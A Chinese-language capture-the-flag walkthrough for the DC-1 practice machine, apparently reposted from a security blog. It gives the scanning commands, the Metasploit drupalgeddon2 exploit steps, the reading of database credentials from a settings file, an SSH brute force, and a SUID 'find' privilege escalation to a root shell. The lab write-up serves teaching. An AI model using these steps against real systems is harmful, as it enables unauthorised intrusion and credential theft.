免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
聚合网络安全,存储安全技术文章,融合安全最新讯息
0x01 信息搜集
首先进行信息收集,扫描一下主机的IP地址。可使用的方法如下:
arp-scan -l
fping -g 192.168.1.1/24
nmap 192.168.1.1/24
靶机地址192.168.1.5,开放了22,80,111端口
查看一下靶机的CMS,CMS为drupal
0x02 漏洞挖掘
使用metasploit查找CMS的漏洞,启动msf控制台
msfconsole
查找漏洞利用模块
search drupal
选择一个比较新的,我们选18年的
use 1
可以直接输入编号选择,这样快一点,也可以输入模块名选择
use unix/webapp/drupal_drupalgeddon2
查看使用此模块需要配置的参数
这里需要设置靶机的IP地址。rhosts(靶机地址),lhost(本机地址)
设置靶机地址
set rhosts 192.168.1.5
可以使用“run”来开始,也可以使用“exploit”
这里显示已经创建了一个会话,就表明利用成功了
输入“shell”就可以进行交互了
利用Python生成一个交互式shell
在当前目录下发现了第一个flag
提示我们“每一个好的CMS都需要配置文件,你也是”
于是我们在/var/www/sites/default/setings.php里发现了flag2
同时里面还有MySQL的账号密码
成功登陆
在数据库里发现了后台管理员账号和密码
由于未知加密方式,所以我们百度寻找解决方法
于是我们修改数据库里的数据,成功修改
PS:加G可以更清楚的显示数据库内容
成功登陆
成功找到flag3
我们读取/etc/passwd,发现flag4,但是我们无法登陆
尝试暴力破解,因为开了22端口
成功破解,密码为“orange”
使用flag4用户登陆靶机
拿下第四个flag
0x03 操作系统提权
利用有suid权限的find命令进行提权,查找有suid权限的命令
find / -perm -4000 2>/dev/null
我们选用/usr/bin/find利用
创建一个名为“w3lkin”的文件夹
find w3lkin -exec "whoami" ;
发现是root权限
进入管理员shell
find w3lkin -exec "/bin/sh" ;
查看root目录下的flag文件
第五个flag找到,完工!!!
本文始发于微信公众号(暗魂攻防实验室):【渗透测试】DC-1通关手册
评论